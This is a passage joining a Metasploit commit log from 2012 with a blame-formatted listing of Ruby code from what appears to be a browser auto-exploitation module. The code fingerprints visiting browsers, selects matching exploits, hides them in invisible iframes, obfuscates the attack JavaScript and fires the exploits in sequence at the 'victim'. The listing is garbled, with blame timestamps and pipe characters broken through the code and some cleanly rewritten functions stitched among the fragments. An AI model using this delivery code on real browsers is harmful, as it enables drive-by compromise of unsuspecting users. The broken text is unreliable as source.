commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd-party av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
};
ENDJS
sploits_for_this_client = []
sploit_cnt = 0
# if we have no client_info, this will add all tests. Otherwise tries
# to only send tests for exploits that target the client's detected
# browser.
@js_tests.each { |browser, sploits|
|
2011-05-20 09:11:43 +00:00
|
|
|
next unless client_matches_browser(client_info, browser)
|
|
|
|
|
2012-04-09 07:53:57 +00:00
|
|
|
# Send all the generics regardless of what the client is. If the
|
|
|
|
# client is nil, then we don't know what it really is, so just err
|
|
|
|
# on the side of shells and send everything. Otherwise, send only
|
|
|
|
# if the client is using the browser associated with this set of
|
|
|
|
# exploits.
|
|
|
|
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
|
2011-05-20 09:11:43 +00:00
|
|
|
sploits.each do |s|
|
|
|
|
if s[:vuln_test].nil? or s[:vuln_test].empty?
|
|
|
|
test = "is_vuln = true"
|
|
|
|
else
|
|
|
|
# get rid of newlines and escape quotes
|
|
|
|
test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
|
|
|
|
end
|
2009-12-16 00:13:57 +00:00
|
|
|
# shouldn't be any in the resource, but just in case...
|
|
|
|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
|
|
|
|
|
2009-08-06 05:56:24 +00:00
|
|
|
# Skip exploits that don't match the client's OS.
|
2009-07-23 08:43:54 +00:00
|
|
|
if (host_info and host_info[:os_name] and s[:os_name])
|
2012-04-05 07:33:07 +00:00
|
|
|
# Reject exploits whose OS doesn't match that of the
|
|
|
|
# victim. Note that host_info comes from javascript OS
|
|
|
|
# detection, NOT the database.
|
|
|
|
if host_info[:os_name] != "undefined"
|
2012-04-09 07:53:57 +00:00
|
|
|
unless s[:os_name].include?(host_info[:os_name])
|
|
|
|
vprint_status("Rejecting #{s[:name]} for non-matching OS")
|
|
|
|
next
|
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
js << "global_exploit_list[global_exploit_list.length] = {\n"
|
|
|
|
js << " 'test':'#{test}',\n"
|
2009-12-16 00:13:57 +00:00
|
|
|
js << " 'resource':'#{res}'\n"
|
2011-05-20 09:11:43 +00:00
|
|
|
js << "};\n"
|
2012-04-05 07:33:07 +00:00
|
|
|
sploits_for_this_client.push s[:name]
|
|
|
|
sploit_cnt += 1
|
2011-05-20 09:11:43 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
|
|
|
# Add a javaEnabled() test specifically for java exploits. Other
|
|
|
|
# exploits that don't require javascript go into a big pile of iframes
|
|
|
|
# that will be dumped out after other exploitation is done, assuming
|
|
|
|
# the browser didn't stop somewhere along the way due to a successful
|
|
|
|
# exploit or a crash from all the heap abuse we just did.
|
|
|
|
noscript_html = ""
|
|
|
|
@noscript_tests.each { |browser, sploits|
|
|
|
|
sploits.each do |s|
|
|
|
|
if s[:name] =~ %r|/java_|
|
|
|
|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
|
|
|
|
js << "global_exploit_list[global_exploit_list.length] = {\n"
|
|
|
|
js << " 'test':'is_vuln = navigator.javaEnabled()',\n"
|
|
|
|
js << " 'resource':'#{res}'\n"
|
|
|
|
js << "};\n"
|
|
|
|
else
|
|
|
|
# Some other kind of exploit that we can't generically
|
|
|
|
# check for in javascript, throw it on the pile.
|
|
|
|
noscript_html << html_for_exploit(s, client_info)
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2012-04-05 07:33:07 +00:00
|
|
|
sploits_for_this_client.push s[:name]
|
2012-04-04 00:22:56 +00:00
|
|
|
sploit_cnt += 1
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2008-09-01 05:19:28 +00:00
|
|
|
}
|
2009-07-19 20:48:47 +00:00
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
# If all of our exploits that require javascript fail, try to continue
|
|
|
|
# with those that don't
|
|
|
|
js << %Q|var noscript_exploits = "|
|
|
|
|
js << Rex::Text.to_hex(noscript_html, "%")
|
|
|
|
js << %Q|";\n|
|
2011-06-03 00:36:26 +00:00
|
|
|
js << %Q|var noscript_div = document.createElement("div");\n|
|
2012-04-05 07:33:07 +00:00
|
|
|
# Have to use innerHTML here to render the new iframes. Using
|
|
|
|
# document.createElement and appendChild() will escape all the
|
|
|
|
# entities.
|
2011-05-20 09:11:43 +00:00
|
|
|
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
|
|
|
|
js << %Q|document.body.appendChild(noscript_div);\n|
|
|
|
|
|
2012-04-08 23:06:23 +00:00
|
|
|
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
|
|
|
|
js << "window.next_exploit(0);\n"
|
2011-06-03 00:36:26 +00:00
|
|
|
|
|
|
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
2012-05-15 23:00:02 +00:00
|
|
|
js.obfuscate unless datastore["DEBUG"]
|
2011-05-20 09:11:43 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
response.body = "#{js}"
|
2008-07-22 07:28:05 +00:00
|
|
|
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("Responding with #{sploit_cnt} exploits")
|
2012-04-05 07:33:07 +00:00
|
|
|
sploits_for_this_client.each do |name|
|
2012-04-11 06:26:25 +00:00
|
|
|
vprint_status("* #{name}")
|
2012-04-05 07:33:07 +00:00
|
|
|
end
|
2008-07-22 07:28:05 +00:00
|
|
|
return response
|
|
|
|
end
|
|
|
|
|
2011-10-17 02:42:01 +00:00
|
|
|
#
# Yields each module that exports autopwn_info, filtering on MATCH and
# EXCLUDE options.
#
# Concretely a module qualifies when it responds to +autopwn_opts+, its
# reference name matches the MATCH regex (unset MATCH accepts every name)
# and does not match the EXCLUDE regex (unset EXCLUDE rejects nothing).
# Both options are operator-supplied regular expressions compiled as-is,
# so a pathological pattern is the operator's own problem.  Yields
# (name, module_class) pairs.
#
def each_autopwn_module(&block)
	wanted   = datastore["MATCH"]   ? Regexp.new(datastore["MATCH"])   : %r{}
	unwanted = datastore["EXCLUDE"] ? Regexp.new(datastore["EXCLUDE"]) : %r{^$}
	framework.exploits.each_module do |name, mod|
		next unless mod.respond_to?("autopwn_opts")
		next if name !~ wanted
		next if name =~ unwanted
		yield name, mod
	end
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns true if an exploit for +browser+ (one of the +OperatingSystems+
|
|
|
|
# constants) should be sent for a particilar client. +client_info+ should
|
|
|
|
# be something returned by +get_client+.
|
|
|
|
#
|
|
|
|
# If +client_info+ is nil then get_client failed and we have no
|
|
|
|
# knowledge of this client, so we can't assume anything about their
|
|
|
|
# browser. If the exploit does not specify a browser target, that
|
|
|
|
# means it it is generic and will work anywhere (or at least be
|
|
|
|
# able to autodetect). If the currently connected client's ua_name
|
|
|
|
# is nil, then the fingerprinting didn't work for some reason.
|
|
|
|
# Lastly, check to see if the client's browser matches the browser
|
|
|
|
# targetted by this group of exploits. In all of these cases, we
|
|
|
|
# need to send all the exploits in the list.
|
|
|
|
#
|
|
|
|
# In contrast, if we have all of that info and it doesn't match, we
|
|
|
|
# don't need to bother sending it.
|
|
|
|
#
|
|
|
|
def client_matches_browser(client_info, browser)
|
2011-10-17 02:42:01 +00:00
|
|
|
if client_info and browser and client_info[:ua_name]
|
2011-05-20 09:11:43 +00:00
|
|
|
if browser != "generic" and client_info[:ua_name] != browser
|
2012-04-09 07:53:57 +00:00
|
|
|
vprint_status("Rejecting exploits for #{browser}")
|
2011-05-20 09:11:43 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
true
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2008-07-23 08:26:42 +00:00
|
|
|
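# consider abstracting this out to a method (probably
# with a different name) of Msf::Auxiliary::Report or
# Msf::Exploit::Remote::HttpServer
#
# Record what we know about the connecting client.  If the request URI
# carries a "sessid=" parameter it is the base64 report produced by our
# JavaScript fingerprinting: a colon-separated list of
# os_name:os_flavor:os_sp:os_lang:arch:ua_name:ua_ver (the JS side sends
# the literal "undefined" for things it could not determine; fields it
# did not send at all come back as nil).  Otherwise we fall back to
# report_user_agent and the User-Agent header alone.
#
# Whatever was learned is always written to the in-memory @targetcache,
# keyed on peer address + User-Agent exactly as get_client expects, so
# exploit selection never has to wait on the database; entries idle for
# more than 60 seconds are expired here.  When the database is active a
# javascript_fingerprint note and a client record are reported as well,
# best-effort.
#
# Every value handled here was produced by the remote browser and is
# untrusted: it is cached, compared and logged, never evaluated.
def record_detection(cli, request)
	os_name   = nil
	os_flavor = nil
	os_sp     = nil
	os_lang   = nil
	arch      = nil
	ua_name   = nil
	ua_ver    = nil

	# A client may omit the User-Agent header entirely, in which case
	# this is nil.  It must not crash the handler when we build the
	# cache key below, and get_client has to be able to find the entry
	# again, so the key is built with interpolation (nil => "").
	ua_string = request['User-Agent']

	# String#index returns nil (never -1) when the marker is absent.
	data_offset = request.uri.index('sessid=')
	if data_offset.nil?
		# then we didn't get a report back from our javascript
		# detection; make a best guess effort from information
		# in the user agent string. The OS detection should be
		# roughly the same as the javascript version on non-IE
		# browsers because it does most everything with
		# navigator.userAgent
		print_status("Recording detection from User-Agent: #{console_safe(ua_string)}")
		report_user_agent(cli.peerhost, request)
	else
		data_offset += 'sessid='.length
		detected_version = request.uri[data_offset, request.uri.length]
		if (0 < detected_version.length)
			detected_version = Rex::Text.decode_base64(Rex::Text.uri_decode(detected_version))
			# The report is under the remote browser's control (the
			# "victim" may well be a honeypot).  Drop control characters
			# before it reaches the console or the cache so a hostile
			# client cannot smuggle terminal escape sequences into the
			# operator's session; none of the expected fields ever
			# legitimately contain them.
			detected_version = console_safe(detected_version)
			print_status("JavaScript Report: #{detected_version}")
			(os_name, os_flavor, os_sp, os_lang, arch, ua_name, ua_ver) = detected_version.split(':')

			if framework.db.active
				note_data = { }
				note_data[:os_name]   = os_name   if os_name   != "undefined"
				note_data[:os_flavor] = os_flavor if os_flavor != "undefined"
				note_data[:os_sp]     = os_sp     if os_sp     != "undefined"
				note_data[:os_lang]   = os_lang   if os_lang   != "undefined"
				note_data[:arch]      = arch      if arch      != "undefined"
				print_status("Reporting: #{note_data.inspect}")

				# Reporting stuff isn't really essential since we store all
				# the target information locally. Make sure any exception
				# raised from the report_* methods doesn't prevent us from
				# sending exploits. This is really only an issue for
				# connections from localhost where we end up with
				# ActiveRecord::RecordInvalid errors because 127.0.0.1 is
				# blacklisted in the Host validations.
				begin
					report_note({
						:host   => cli.peerhost,
						:type   => 'javascript_fingerprint',
						:data   => note_data,
						:update => :unique_data,
					})
					client_info = {
						:host      => cli.peerhost,
						:ua_string => ua_string,
						:ua_name   => ua_name,
						:ua_ver    => ua_ver
					}
					report_client(client_info)
				rescue => e
					elog("Reporting failed: #{e.class} : #{e.message}")
				end
			end
		end
	end

	# Always populate the target cache since querying the database is too
	# slow for real-time.
	key = "#{cli.peerhost}#{ua_string}"
	now = Time.now.to_i
	@targetcache ||= {}
	@targetcache[key] ||= {}
	@targetcache[key][:updated_at] = now

	# Clean the cache: forget anyone we haven't heard from in a minute.
	# The entry we just touched has updated_at == now, so it survives.
	@targetcache.delete_if { |addr, info| now > info[:updated_at] + 60 }

	# Keep the attributes the same as if it were created in
	# the database.
	@targetcache[key][:ua_string] = ua_string
	@targetcache[key][:ua_name]   = ua_name
	@targetcache[key][:ua_ver]    = ua_ver

	@targetcache[key][:host] = {}
	@targetcache[key][:host][:os_name]   = os_name
	@targetcache[key][:host][:os_flavor] = os_flavor
	@targetcache[key][:host][:os_sp]     = os_sp
	@targetcache[key][:host][:os_lang]   = os_lang
end

# Strip ASCII control characters (including ESC, and therefore ANSI
# escape sequences) from a client-supplied string before it is echoed to
# the operator's console.  Returns a plain String; nil becomes "".
def console_safe(str)
	str.to_s.gsub(/[\x00-\x1f\x7f]/, '')
rescue ArgumentError
	# Invalid byte sequence for the string's encoding; show an escaped
	# representation rather than losing the log line altogether.
	str.to_s.inspect
end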
|
|
|
|
|
2010-03-04 07:37:58 +00:00
|
|
|
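# Override super#get_client to use a cache since the database is generally
# too slow to be useful for realtime tasks. This essentially creates an
# in-memory database. The upside is that it works if the database is
# broken (which seems to be all the time now).
#
# +opts+ carries :host and :ua_string; together they form the cache key
# that record_detection stores under (peer address followed by the raw
# User-Agent, a missing header contributing nothing).  Returns the cached
# hash (:ua_name, :ua_ver, :ua_string, :host => {...}, :updated_at) or
# nil when this client has not been seen yet -- including when nothing
# at all has been recorded so far, which previously raised on a nil
# @targetcache, and when the client sent no User-Agent, which previously
# raised on String + nil.
def get_client(opts)
	return nil if @targetcache.nil?
	@targetcache["#{opts[:host]}#{opts[:ua_string]}"]
end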
|
|
|
|
|
2008-07-22 07:28:05 +00:00
|
|
|
# Wrap an exploit's resource path in a hidden iframe, or -- when the
# DefangedDetection action is running -- in a plain <p> that merely names
# it so nothing is actually launched against the client.
#
# +resource+ is an internal module resource path (see exploit_resource)
# and is dropped into the markup unescaped, so it must never be derived
# from client-supplied data.
def build_iframe(resource)
	if action.name == 'DefangedDetection'
		"<p>iframe #{resource}</p>"
	else
		#%Q|<iframe src="#{resource}" ></iframe>|
		%Q|<iframe src="#{resource}" style="visibility:hidden" height="0" width="0" border="0"></iframe>|
	end
end
|
2008-11-25 08:51:17 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
# Resource path (URI) that the running exploit module +name+ is serving
# on, as reported by its get_resource.  If no such module is loaded, or
# it doesn't expose get_resource, log an error and hand back a
# "404<name>.html" placeholder so the client-side exploit list stays
# well-formed and the request simply 404s.
def exploit_resource(name)
	mod = @exploits[name]
	unless mod && mod.respond_to?("get_resource")
		print_error("Don't have an exploit by that name, returning 404#{name}.html")
		return "404#{name}.html"
	end
	#print_line("Returning #{mod.get_resource.inspect}, for #{name}")
	mod.get_resource
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
|
|
|
# When the DEBUG option is set, return a JavaScript statement that
# appends +msg+ (already a JS expression, typically a quoted string) to
# the page body so progress is visible in the victim's browser; otherwise
# return "" so nothing is emitted.  Debug output is plainly visible on
# the target and is not obfuscated, so leave it off for real engagements.
def js_debug(msg)
	return "" unless datastore['DEBUG']
	"document.body.innerHTML += #{msg};"
end
|
2010-03-04 07:37:58 +00:00
|
|
|
|
2010-08-30 22:17:26 +00:00
|
|
|
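# Stop every exploit module job and every payload handler job this
# server started, then let the HTTP server clean itself up.
#
# Setup may have aborted before @exploits / @handler_job_ids were
# populated; cleanup must still succeed in that case so the server job
# itself can be torn down, hence the nil guards.  Jobs that have already
# gone away are simply skipped.
def cleanup
	print_status("Cleaning up exploits...")
	(@exploits || {}).each_pair do |name, mod|
		# if the module died for some reason, we can't kill it
		next unless mod
		job = framework.jobs[mod.job_id.to_s]
		job.stop if job
	end
	(@handler_job_ids || []).each do |id|
		job = framework.jobs[id.to_s]
		job.stop if job
	end
	super
end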
|
|
|
|
|
2008-11-17 07:53:44 +00:00
|
|
|
end
|